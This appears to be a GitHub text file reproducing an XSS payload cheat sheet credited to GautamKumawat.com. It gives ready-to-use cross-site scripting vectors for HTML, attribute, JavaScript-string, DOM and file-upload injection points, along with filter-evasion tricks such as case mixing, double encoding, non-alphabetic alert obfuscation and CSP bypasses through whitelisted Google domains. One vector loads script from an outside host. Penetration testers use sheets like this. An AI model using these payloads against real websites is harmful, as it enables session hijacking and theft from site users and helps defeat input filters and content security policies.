-
Notifications
You must be signed in to change notification settings - Fork 0
/
Text File
172 lines (171 loc) · 7.47 KB
/
Text File
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
Basic XSS Bypass
HTML Context – Simple Tag Injection
Use when input lands inside an attribute’s value of an HTML tag or outside
tag except the ones described in next case.
<svg onload=alert(1)>
"><svg onload=alert(1)>
HTML Context – In Block Tag Injection
Use when input lands inside or between opening/closing of the following
tags: <title><style><script><textarea><noscript><pre><xmp> and
<iframe> (</tag> is accordingly).
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
HTML Context – Inline Injection
Use when input lands inside an attribute’s value of an HTML tag but that tag
can’t be terminated by greater than sign (>).
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
HTML Context – Source Injection
Use when input lands as a value of the following HTML tag attributes: href, src, data
or action (also formaction). For src in script tag use an external script call (URL) or
“data:,alert(1)”. 2nd payload below alerts out of target’s context for Webkit browsers.
javascript:alert(1)
data:text/html,<svg onload=alert(1)>
Javascript Context – Code Injection
Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'-alert(1)//
Javascript Context – Code Injection with Escape Bypass
Use when input lands in a script block, inside a string delimited value but
quotes are escaped by a backslash.
\'-alert(1)//
Javascript Context – Code Injection in Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string
delimited value and inside a single logical block like function or conditional
(if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
\'}alert(1);{//
Javascript Context – Tag Injection
Use when input lands anywhere in a script block.
</script><svg onload=alert(1)>
www.GautamKumawat.com
Advance XSS Bypass
Multi Reflection – Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Multi Reflection – Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
Multi Input Reflections (Double & Triple)
Use to take advantage of multiple input reflections on same page.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
File Upload Injection – Filename
Use when uploaded filename is reflected somewhere in target page.
"><svg onload=alert(1)>.gif
File Upload Injection – Metadata
Use when metadata of uploaded file is reflected somewhere in target
page. It uses command-line exiftool and any metadata field can be set.
root@Gautam:~$ exiftool -Artist='"><svg onload=alert(1)>'
xss.jpeg File Upload Injection – SVG File
Use to create a stored XSS on target when uploading image files. Save
content below as “xss.svg”.
<svg xmlns="http://www.w3.org/2000/svg"
onload="alert(1)"/> DOM Insert Injection
Use to test for XSS when injection gets inserted into DOM as valid markup
instead of being reflected in source code. It works for cases where script tag
and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
DOM Insert Injection – Resource Request
Use when javascript code of the page inserts into page the results of a
request to an URL controlled by attacker (injection).
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
www.GautamKumawat.com
Filter Bypass
Mixed Case XSS
Use to bypass case-sensitive filters.
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
Unclosed Tags
Use in HTML injections to avoid filtering based in the presence of both lower
than (<) and greater than (>) signs. It requires a native greater than sign in
source code after input reflection.
<svg onload=alert(1)//
<svg onload="alert(1)"
Uppercase XSS
Use when application reflects input in uppercase.
<SVG ONLOAD=alert(1)>
<SCRIPT
SRC=//GAUTAMKUMAWAT.COM/1></SCRIPT>
Extra Content for Script Tags
Use when filter looks for “<script>” or “<script src=...” with some
variations but without checking for other non-needed attribute.
<script/x>alert(1)</script>
Double Encoded XSS
Use when application performs double decoding of input.
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
Alert without Parentheses (Tag Exclusive)
Use only in HTML injections when parentheses are not allowed. Replace
“&” with “%26” in URLs.
<svg onload=alert(1)>
<svg onload=alert(1)>
Alert without Alphabetic Chars
Use when alphabetic characters are not allowed. Following is alert(1).
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
Alert Obfuscation
Use to trick several regular expression (regex) filters. It might be combined
with previous alternatives (above). The shortest option “top” can also be
replaced by “window”, “parent”, “self” or “this” depending on context.
(alert)(1)
a=alert,a(1)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
www.GautamKumawat.com
CSP Bypass (for Whitelisted Google Domains)
Use when there’s a CSP (Content-Security Policy) that allows execution
from these domains.
<script src=https://www.google.com/complete/search?client=chrome
%26jsonp=alert(1);></script>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{constructor.constructor('alert(1)')()}}
Vectors without Event Handlers
Use as an alternative to event handlers, if they are not allowed. Some
require user interaction as stated in the vector itself (also part of them).
<script>alert(1)</script> <script
src=data:,alert(1)> <iframe
src=javascript:alert(1)> <embed
src=javascript:alert(1)> <a
href=javascript:alert(1)>click <math><brute
href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) /> <math><brute
xlink:href=javascript:alert(1)>click
Vectors with Agnostic Event Handlers
Use the following vectors when all known HTML tag names are not allowed. Any
alphabetic char or string can be used as tag name in place of “x”. They require user
interaction as stated by their very text content (which make part of the vectors too).
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!